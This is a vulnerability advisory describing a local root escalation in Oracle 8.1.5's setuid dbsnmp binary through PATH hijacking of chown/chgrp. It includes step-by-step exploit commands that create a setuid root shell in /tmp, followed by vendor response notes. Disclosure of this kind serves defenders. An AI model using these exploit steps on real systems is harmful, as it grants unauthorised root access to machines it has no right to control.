COMMAND

    dbsnmp

SYSTEMS AFFECTED

    Oracle 8.1.5 (Only tested in Digital Unix)

PROBLEM

    Ismael Briones found following.  There is a problem in dbsnmp that
    can be used by local users to obtain root privileges.  The  dbsnmp
    is setuid root.   When a user  execute dbsnmp there  is a call  to
    chown and chgrp,  but without especify  the path, so  any user can
    define his PATH variable to exploit this vulnerability.  Any  user
    with local access, can gain root privileges.  Exploit:

        - export PATH=~/bin/:$PATH
        - Then we create the file ~/bin/chown or ~/bin/chgrp:

          #!/bin/sh
          cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX
          (We have to put all in the same line, separated by semicolon)

          We make our chown or chgrp executable:

          chmod +x  ~/bin/chown

          chmod +x  ~/bin/chgrp

    When the  user execute  dbsnmp, the  system look  for chown in the
    first directory of the PATH  variable, execute our chown file  and
    whe have a shell setuid root in /tmp/XXX.

    The Oracle docs  go on and  say that to  check whether or  not the
    dbsnmp  agent  is  running,  login  as  oracle  on the appropriate
    server, and run the following:

        $ <path to oracle bin>/lsnrctl
        
        LSNRCTL for Solaris: Version 8.1.5.0.0 - Production on 01-AUG-01 15:46:30
        
        (c) Copyright 1998 Oracle Corporation.  All rights reserved.
        
        Welcome to LSNRCTL, type "help" for information.
        
        LSNRCTL> dbsnmp_status
        The db subagent is not started.

SOLUTION

    Oracle 8.1.6 is not  vulnerable.  Vendor was  contacted 30/07/2001
    and Oracle answer: "We are investigating a fix as we speak."

    It's funny to see Oracle's canned response to this.  Not 100% sure
    this is exactly the same problem, but Aaron C. Newman worked  with
    them fixing what looks like the  same problem back in 1999.   They
    provided a patch way back then - might be that whoever respond  to
    you is not "up to speed":

        http://oliver.efri.hr/~crv/security/bugs/Others/oracle7.html